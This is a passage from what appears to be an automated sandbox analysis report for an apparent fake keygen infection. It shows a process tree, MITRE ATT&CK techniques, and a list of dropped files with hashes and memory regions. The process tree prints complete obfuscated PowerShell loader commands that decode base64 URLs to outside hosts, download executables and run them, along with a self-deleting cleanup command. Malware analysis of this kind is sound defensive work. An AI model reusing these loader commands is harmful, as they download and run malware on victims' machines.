$mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1432
                  • C:\Users\Public\fov.exe
                    "C:\Users\Public\fov.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4776
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                        PID:3060
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Modifies registry class
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4984
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                            8⤵
                              PID:1528
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                9⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4328
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  PID:4616
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              8⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:756
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 756 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\160951470668033\\* & exit
                                9⤵
                                  PID:4632
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 756
                                    10⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4708
                          • C:\Users\Public\fov.exe
                            "C:\Users\Public\fov.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:4904
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3667.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3956
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1408
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 2
                      3⤵
                      • Delays execution with timeout.exe
                      PID:2000
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3667.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4120
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4200
                        • C:\Users\Public\bof.exe
                          "C:\Users\Public\bof.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:1444
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:4640
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:4332
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 1244
                                8⤵
                                • Program crash
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2100
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:4652
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:4784
                          • C:\Users\Public\bof.exe
                            "C:\Users\Public\bof.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:2500
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3667.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4244
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4360
                • C:\Windows\SysWOW64\DllHost.exe
                  C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  1⤵
                    PID:4668

                  Network

                  MITRE ATT&CK Matrix ATT&CK v6

                  Persistence

                  Modify Existing Service

                  1
                  T1031

                  Defense Evasion

                  Modify Registry

                  2
                  T1112

                  Disabling Security Tools

                  2
                  T1089

                  Credential Access

                  Credentials in Files

                  3
                  T1081

                  Discovery

                  Query Registry

                  2
                  T1012

                  System Information Discovery

                  2
                  T1082

                  Collection

                  Data from Local System

                  3
                  T1005

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\ProgramData\freebl3.dll
                  • C:\ProgramData\freebl3.dll
                  • C:\ProgramData\mozglue.dll
                  • C:\ProgramData\mozglue.dll
                  • C:\ProgramData\msvcp140.dll
                  • C:\ProgramData\msvcp140.dll
                  • C:\ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • C:\ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • C:\ProgramData\softokn3.dll
                  • C:\ProgramData\softokn3.dll
                  • C:\ProgramData\sqlite3.dll
                  • C:\ProgramData\sqlite3.dll
                  • C:\ProgramData\vcruntime140.dll
                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  • C:\Users\Admin\AppData\Local\Temp\3667.tmp\Keygen.exe
                  • C:\Users\Admin\AppData\Local\Temp\3667.tmp\Keygen.exe
                  • C:\Users\Admin\AppData\Local\Temp\3667.tmp\b.hta
                  • C:\Users\Admin\AppData\Local\Temp\3667.tmp\b1.hta
                  • C:\Users\Admin\AppData\Local\Temp\3667.tmp\ba.hta
                  • C:\Users\Admin\AppData\Local\Temp\3667.tmp\ba1.hta
                  • C:\Users\Admin\AppData\Local\Temp\3667.tmp\m.hta
                  • C:\Users\Admin\AppData\Local\Temp\3667.tmp\m1.hta
                  • C:\Users\Admin\AppData\Local\Temp\3667.tmp\start.bat
                  • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FyoCC7SDb8.exe
                  • C:\Users\Admin\AppData\Local\Temp\FyoCC7SDb8.exe
                  • C:\Users\Admin\AppData\Local\Temp\Kud9SronT5.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\gb8LphRkfv.exe
                  • C:\Users\Admin\AppData\Local\Temp\gb8LphRkfv.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\oruH67uNPH.exe
                  • C:\Users\Admin\AppData\Local\Temp\oruH67uNPH.exe
                  • C:\Users\Public\bof.exe
                  • C:\Users\Public\bof.exe
                  • C:\Users\Public\bof.exe
                  • C:\Users\Public\fov.exe
                  • C:\Users\Public\fov.exe
                  • C:\Users\Public\fov.exe
                  • C:\Users\Public\qwn.exe
                  • C:\Users\Public\qwn.exe
                  • C:\Users\Public\qwn.exe
                  • C:\Windows\temp\mydae0hj.inf
                  • \ProgramData\mozglue.dll
                  • \ProgramData\mozglue.dll
                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\sqlite3.dll
                  • \ProgramData\sqlite3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                    MD5

                    02cc7b8ee30056d5912de54f1bdfc219

                    SHA1

                    a6923da95705fb81e368ae48f93d28522ef552fb

                    SHA256

                    1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                    SHA512

                    0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                  • \Users\Admin\AppData\LocalLow\sqlite3.dll
                  • memory/208-15-0x0000000000000000-mapping.dmp
                  • memory/692-20-0x0000000070230000-0x000000007091E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/692-35-0x0000000007C40000-0x0000000007C41000-memory.dmp
                    Filesize

                    4KB

                  • memory/692-12-0x0000000000000000-mapping.dmp
                  • memory/692-37-0x0000000007E20000-0x0000000007E21000-memory.dmp
                    Filesize

                    4KB

                  • memory/692-49-0x0000000008200000-0x0000000008201000-memory.dmp
                    Filesize

                    4KB

                  • memory/692-53-0x0000000008650000-0x0000000008651000-memory.dmp
                    Filesize

                    4KB

                  • memory/756-256-0x0000000000400000-0x0000000000434000-memory.dmp
                    Filesize

                    208KB

                  • memory/756-254-0x0000000000417A8B-mapping.dmp
                  • memory/756-253-0x0000000000400000-0x0000000000434000-memory.dmp
                    Filesize

                    208KB

                  • memory/860-323-0x0000000000000000-mapping.dmp
                  • memory/860-328-0x0000000000290000-0x0000000000291000-memory.dmp
                    Filesize

                    4KB

                  • memory/860-330-0x0000000000AE0000-0x0000000000BE1000-memory.dmp
                    Filesize

                    1.0MB

                  • memory/1172-0-0x0000000000000000-mapping.dmp
                  • memory/1408-22-0x0000000000000000-mapping.dmp
                  • memory/1408-27-0x0000000070230000-0x000000007091E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1432-61-0x0000000008660000-0x0000000008661000-memory.dmp
                    Filesize

                    4KB

                  • memory/1432-28-0x0000000070230000-0x000000007091E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1432-96-0x00000000093A0000-0x00000000093A1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1432-98-0x000000000A9A0000-0x000000000A9A1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1432-81-0x0000000009E20000-0x0000000009E21000-memory.dmp
                    Filesize

                    4KB

                  • memory/1432-95-0x0000000009B50000-0x0000000009B51000-memory.dmp
                    Filesize

                    4KB

                  • memory/1432-21-0x0000000000000000-mapping.dmp
                  • memory/1444-155-0x0000000000000000-mapping.dmp
                  • memory/1528-250-0x0000000000000000-mapping.dmp
                  • memory/1588-306-0x0000000000000000-mapping.dmp
                  • memory/1608-2-0x0000000000000000-mapping.dmp
                  • memory/1608-4-0x0000000000000000-mapping.dmp
                  • memory/2000-18-0x0000000000000000-mapping.dmp
                  • memory/2100-214-0x0000000004E90000-0x0000000004E91000-memory.dmp
                    Filesize

                    4KB

                  • memory/2100-237-0x00000000056C0000-0x00000000056C1000-memory.dmp
                    Filesize

                    4KB

                  • memory/2120-7-0x0000000000000000-mapping.dmp
                  • memory/2148-9-0x0000000000000000-mapping.dmp
                  • memory/2188-314-0x0000000004D80000-0x0000000004D81000-memory.dmp
                    Filesize

                    4KB

                  • memory/2188-300-0x0000000000000000-mapping.dmp
                  • memory/2188-304-0x0000000070D10000-0x00000000713FE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2188-321-0x000000000AB00000-0x000000000AB05000-memory.dmp
                    Filesize

                    20KB

                  • memory/2188-310-0x00000000005F0000-0x00000000005F1000-memory.dmp
                    Filesize

                    4KB

                  • memory/2188-318-0x0000000004E40000-0x0000000004E52000-memory.dmp
                    Filesize

                    72KB

                  • memory/2432-11-0x0000000000000000-mapping.dmp
                  • memory/2484-303-0x0000000005060000-0x0000000005061000-memory.dmp
                    Filesize

                    4KB

                  • memory/2484-294-0x0000000000770000-0x0000000000771000-memory.dmp
                    Filesize

                    4KB

                  • memory/2484-290-0x0000000000000000-mapping.dmp
                  • memory/2484-293-0x0000000070D10000-0x00000000713FE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2500-177-0x000000000043FCC3-mapping.dmp
                  • memory/2500-179-0x0000000000400000-0x0000000000498000-memory.dmp
                    Filesize

                    608KB

                  • memory/2680-222-0x0000000000000000-mapping.dmp
                  • memory/2716-336-0x0000000070D10000-0x00000000713FE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2716-335-0x0000000000000000-mapping.dmp
                  • memory/3056-13-0x0000000000000000-mapping.dmp
                  • memory/3056-40-0x00000000079A0000-0x00000000079A1000-memory.dmp
                    Filesize

                    4KB

                  • memory/3056-25-0x0000000007240000-0x0000000007241000-memory.dmp
                    Filesize

                    4KB

                  • memory/3056-19-0x0000000070230000-0x000000007091E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/3056-33-0x0000000006FC0000-0x0000000006FC1000-memory.dmp
                    Filesize

                    4KB

                  • memory/3056-84-0x0000000008DC0000-0x0000000008DC1000-memory.dmp
                    Filesize

                    4KB

                  • memory/3056-23-0x0000000004560000-0x0000000004561000-memory.dmp
                    Filesize

                    4KB

                  • memory/3060-210-0x0000000000000000-mapping.dmp
                  • memory/3956-17-0x0000000000000000-mapping.dmp
                  • memory/4120-55-0x0000000000000000-mapping.dmp
                  • memory/4196-205-0x0000000000000000-mapping.dmp
                  • memory/4200-59-0x0000000000000000-mapping.dmp
                  • memory/4200-66-0x0000000070230000-0x000000007091E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/4244-62-0x0000000000000000-mapping.dmp
                  • memory/4328-260-0x0000000070D10000-0x00000000713FE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/4328-258-0x0000000000000000-mapping.dmp
                  • memory/4328-283-0x000000000AD40000-0x000000000AD64000-memory.dmp
                    Filesize

                    144KB

                  • memory/4328-263-0x0000000005440000-0x0000000005441000-memory.dmp
                    Filesize

                    4KB

                  • memory/4328-261-0x0000000000C90000-0x0000000000C91000-memory.dmp
                    Filesize

                    4KB

                  • memory/4332-225-0x0000000000417A8B-mapping.dmp
                  • memory/4332-181-0x0000000000417A8B-mapping.dmp
                  • memory/4332-231-0x0000000000417A8B-mapping.dmp
                  • memory/4332-233-0x0000000000417A8B-mapping.dmp
                  • memory/4332-230-0x0000000000417A8B-mapping.dmp
                  • memory/4332-236-0x0000000000417A8B-mapping.dmp
                  • memory/4332-234-0x0000000000417A8B-mapping.dmp
                  • memory/4332-235-0x0000000000417A8B-mapping.dmp
                  • memory/4332-228-0x0000000000417A8B-mapping.dmp
                  • memory/4332-227-0x0000000000417A8B-mapping.dmp
                  • memory/4332-224-0x0000000000417A8B-mapping.dmp
                  • memory/4332-232-0x0000000000417A8B-mapping.dmp
                  • memory/4332-185-0x0000000000400000-0x0000000000439000-memory.dmp
                    Filesize

                    228KB

                  • memory/4360-70-0x0000000070230000-0x000000007091E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/4360-68-0x0000000000000000-mapping.dmp
                  • memory/4616-289-0x0000000000400000-0x0000000000420000-memory.dmp
                    Filesize

                    128KB

                  • memory/4616-287-0x000000000041A684-mapping.dmp
                  • memory/4616-286-0x0000000000400000-0x0000000000420000-memory.dmp
                    Filesize

                    128KB

                  • memory/4632-280-0x0000000000000000-mapping.dmp
                  • memory/4640-167-0x0000000000000000-mapping.dmp
                  • memory/4652-169-0x0000000000000000-mapping.dmp
                  • memory/4672-305-0x0000000000000000-mapping.dmp
                  • memory/4672-309-0x0000000070D10000-0x00000000713FE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/4672-312-0x0000000000440000-0x0000000000441000-memory.dmp
                    Filesize

                    4KB

                  • memory/4672-316-0x00000000025E0000-0x00000000025E1000-memory.dmp
                    Filesize

                    4KB

                  • memory/4672-322-0x0000000002770000-0x0000000002781000-memory.dmp
                    Filesize

                    68KB

                  • memory/4672-333-0x000000000A950000-0x000000000A953000-memory.dmp
                    Filesize

                    12KB

                  • memory/4708-281-0x0000000000000000-mapping.dmp
                  • memory/4776-196-0x00000000060B0000-0x00000000060B1000-memory.dmp
                    Filesize

                    4KB

                  • memory/4776-110-0x0000000000C60000-0x0000000000C61000-memory.dmp
                    Filesize

                    4KB

                  • memory/4776-195-0x00000000059F0000-0x0000000005AA0000-memory.dmp
                    Filesize

                    704KB

                  • memory/4776-107-0x0000000070230000-0x000000007091E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/4776-211-0x0000000006870000-0x000000000687D000-memory.dmp
                    Filesize

                    52KB

                  • memory/4776-102-0x0000000000000000-mapping.dmp
                  • memory/4784-184-0x000000000041A684-mapping.dmp
                  • memory/4808-106-0x0000000000000000-mapping.dmp
                  • memory/4868-295-0x0000000000000000-mapping.dmp
                  • memory/4904-217-0x0000000000400000-0x0000000000493000-memory.dmp
                    Filesize

                    588KB

                  • memory/4904-213-0x0000000000400000-0x0000000000493000-memory.dmp
                    Filesize

                    588KB

                  • memory/4904-215-0x000000000043FCC3-mapping.dmp
                  • memory/4932-118-0x0000000000000000-mapping.dmp
                  • memory/4956-121-0x0000000000000000-mapping.dmp
                  • memory/4984-223-0x0000000000AC0000-0x0000000000AC1000-memory.dmp
                    Filesize

                    4KB

                  • memory/4984-221-0x0000000072430000-0x0000000072B1E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/4984-219-0x0000000000000000-mapping.dmp
                  • memory/4984-229-0x00000000013A0000-0x00000000013A1000-memory.dmp
                    Filesize

                    4KB

                  • memory/4984-247-0x000000000AF20000-0x000000000AF71000-memory.dmp
                    Filesize

                    324KB

                  • memory/5028-129-0x000000000043FCC3-mapping.dmp
                  • memory/5028-133-0x0000000000400000-0x0000000000498000-memory.dmp
                    Filesize

                    608KB

                  • memory/5028-128-0x0000000000400000-0x0000000000498000-memory.dmp
                    Filesize

                    608KB

                  • memory/5040-130-0x0000000000400000-0x0000000000439000-memory.dmp
                    Filesize

                    228KB

                  • memory/5040-132-0x0000000000417A8B-mapping.dmp
                  • memory/5040-135-0x0000000000400000-0x0000000000439000-memory.dmp
                    Filesize

                    228KB

                  • memory/5040-206-0x00000000038B0000-0x00000000038B1000-memory.dmp
                    Filesize

                    4KB

                  • memory/5052-315-0x0000000000000000-mapping.dmp
                  • memory/5092-136-0x0000000000400000-0x0000000000425000-memory.dmp
                    Filesize

                    148KB

                  • memory/5092-137-0x000000000041A684-mapping.dmp
                  • memory/5092-139-0x0000000000400000-0x0000000000425000-memory.dmp
                    Filesize

                    148KB